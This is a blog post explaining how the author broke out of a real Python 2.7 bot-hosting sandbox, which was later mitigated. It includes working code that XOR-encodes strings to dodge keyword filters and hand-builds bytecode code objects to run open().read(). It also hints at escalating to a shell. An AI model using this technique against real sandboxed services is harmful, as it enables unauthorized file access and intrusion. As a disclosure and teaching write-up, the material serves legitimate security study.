Saturday, September 6, 2014

Bypassing a python sandbox by abusing code objects

Awhile ago, I stumbled upon a service that let you write python-bots to interact with a number of external services. The basic idea was that you only had to worry about your logic, and they would provide a wrapper around API's and take care of hosting the bot for a monthly fee.

Python "Jail" or sandbox escapes are fairly common in CTFs, and I knew that there are all sorts of "magical" ways of doing things in python, so I decided to poke around a bit. Sure enough, I found a way of circumventing the sandbox and getting (kind of) arbitrary python to run. I've since talked to the founder about this, and they've taken steps to mitigate the damage one could do, so I thought I'd talk about some real world python-chaos :).[Specifically, virtualization is used to protect the host system]. With the level of access I had, I'm fairly sure it was possible to get a shell, and from there, who knows...

The remainder of this post will describe the process of breaking out of the sandbox they set up. Everything was written/tested on python 2.7.6.

At face value, the service was stripped of most dangerous components fairly well:
  • "Fun" modules could not be imported (sys, os, etc)
  • "Fun" keywords/functions got your script thrown out (exec, open(), read(), compile(), etc)
  • "Fun" attributes, nope! (myfunc.func_code)
  •  Fun stuff couldn't even be in static strings! (Annoying, but not really that important). 
The last point was the easiest to get around. Just send up a list of xor'd values, and dynamically build whatever string you need.
str1 = [30, 30, 35, 52, 40, 45, 53, 40, 47, 50, 30, 30]
for i in range(0,len(str1)):
        str1[i] = chr(str1[i] ^ 0x41)
str1 = ''.join(str1)
That gets us around most of the basic string-matching, but it still doesn't let us do anything interesting. The rest of the exploit relies on code objects. If you're not familiar with them, this is a great overview

So, normally, python allows you to access all the guts of functions. A Function is basically a wrapper for a code-object, and (as the name implies) you can access and modify these objects as you like. The python interpreter acts as a sort of VM, fetching and executing bytecode found inside code-objects. Python bytecode is assembly-ish. You can take a look here if you want to play around

At first, its tempting to just try directly modifying a dummy function's bytecode. However, that requires accessing the "func_code" member, which is explicitly blocked. Additionally, just modifying bytecode wouldn't be enough.  Fortunately, it /was/ possible to get access to a code-object.
cdbj = type(myfunc.__code__)

Now that we have a dummy code object, we can proceed to fill it in, and slide it into an empty function. The question at this point, is what do we fill it in with?
>>> dir(f.__code__)
['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', 
'__getattribute__','__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__'
, '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', 
'__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 
'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 
'co_stacksize', 'co_varnames']

So, that looks a bit intimidating, but really, we're only interested in a few of these. Specifically, I used
  • co_code: string of raw compiled bytecode
  • co_consts: tuple of constants used in the bytecode 
  • co_names: tuple of names of local variables
  Most of the others are documented here if you want to take a look. 
I had an info-leak that gave me the path of an interesting file, so I wanted my bytecode to basically do: open(<filename).read().

You can inspect bytecode in a user-friendly-ish way by using the dis module. This makes it easier to understand the fields we'll be filling in.

import dis
def read():
        return open("./",'r').read()

 28           0 LOAD_GLOBAL              0 (open)
              3 LOAD_CONST               1 ('./')
              6 LOAD_CONST               2 ('r')
              9 CALL_FUNCTION            2
             12 LOAD_ATTR                1 (read)
             15 CALL_FUNCTION            0
             18 RETURN_VALUE        
Now, to actually access the bytecode that results in this:
bytecode = read.__code__.co_code
print bytecode.encode('hex')
>>> 7400006401006402008302006a010083000053
This gives us all the necessary pieces to create our code object. We can slide in our values like this:
code = type(myfunc.__code__)        #Get a Code Object
bytecode = "7400006401006402008302006a010083000053".decode('hex')   #Get our bytecode
filename = "./"             #Set our filename
consts = (None,filename,'r')      #Set up our constants
names = ('open','read')           #Set up our names
#Slide our values into the code object.
codeobj = code(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '<module>', 1, '', (), ()) 
Great! Now we've created a code object with our desired functionality, without using anything that would trigger alerts. The only thing left to do is finding a way to execute it! Thankfully, functions in python are quite malleable. You can read about all their attributes here.
First, we start off with an empty, "dummy" function, and obtain a variable of type "function" that we can modify.
def f():
function = type(f)
Turns out there's one more major thing we need to do before we can slide in our code object. Python functions have a __globals__ attribute. This is described in the python documentation as: 

A reference to the dictionary that holds the function’s global variables — the global namespace of the module in which the function was defined.
Since the only thing we're worried about in our function is using the open() and read() built-in calls, we can create this dictionary easily enough.
import __builtin__
mydict = {}
mydict["__builtins__"] = __builtin__
At this point, the only thing left to do is put all the pieces together. Using the "function" variable we created before:
return function(codeobj, mydict, None, None, None)

So, in conclusion, we've created a code object and devised a way of executing it. Obviously, it is possible to block a few more keywords and stop this attack from being possible, but it highlights the difficulty of getting this sort of thing right.

For some ideas of taking this to the next level, take a look at this CTF writeup that discusses using a read/write primitive to obtain shell-level remote code execution on the host system. Certainly something to keep in mind.

Actually getting this to execute on similar production environments will probably require a bit more obfuscation/creativity. However, I've put together an example script that ties together all the steps explained here into a simple package that you should be able to execute and play with locally. Enjoy! :)